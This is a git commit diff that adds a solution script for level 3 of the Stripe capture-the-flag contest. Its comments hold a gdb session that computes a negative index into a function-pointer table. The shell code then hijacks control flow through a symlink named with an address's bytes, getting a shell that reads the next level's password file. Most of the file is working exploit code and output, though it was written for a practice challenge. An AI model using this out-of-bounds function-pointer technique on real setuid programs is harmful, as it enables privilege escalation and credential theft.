diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-02-26 01:43:01 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-02-26 01:47:20 +0100 |
commit | 5d3c4121034acf6987cc7ad9427d6e9c828db326 (patch) | |
tree | 94330bee34805b29b7ce0ca08fab03829906cb23 /level03.sh | |
download | Stripe-CTF-5d3c4121034acf6987cc7ad9427d6e9c828db326.tar.xz Stripe-CTF-5d3c4121034acf6987cc7ad9427d6e9c828db326.zip |
Initial commit.
Diffstat (limited to 'level03.sh')
-rw-r--r-- | level03.sh | 24 |
1 files changed, 24 insertions, 0 deletions
diff --git a/level03.sh b/level03.sh new file mode 100644 index 0000000..7470514 --- /dev/null +++ b/level03.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# level03@ctf4:/tmp/tmp.lZLfBZODXa$ gdb /levels/level03 +# (gdb) break truncate_and_call +# Breakpoint 1 at 0x8048780: file level03.c, line 57. +# (gdb) run 1 something +# Starting program: /levels/level03 1 something +# Breakpoint 1, truncate_and_call (fns=0xffeecfec, index=1, user_string=0xffeed986 "something") at level03.c:57 +# 57 in level03.c +# (gdb) n +# 60 in level03.c +# (gdb) p &buf +# $1 = (char (*)[64]) 0xffeecf7c +# (gdb) p fns +# $2 = (fn_ptr *) 0xffeecfec +# (gdb) p (0xffeecfec-0xffeecf7c)/4 +# $3 = 28 +# (gdb) p run +# $4 = {int (const char *)} 0x804875b <run> +# (gdb) quit + +ln -s /bin/sh "$(printf '\x5b\x87\x04\x08')" +echo "cat /home/level04/.password" | PATH=.:$PATH /levels/level03 -28 "$(printf '\x5b\x87\x04\x08')" +rm "$(printf '\x5b\x87\x04\x08')" |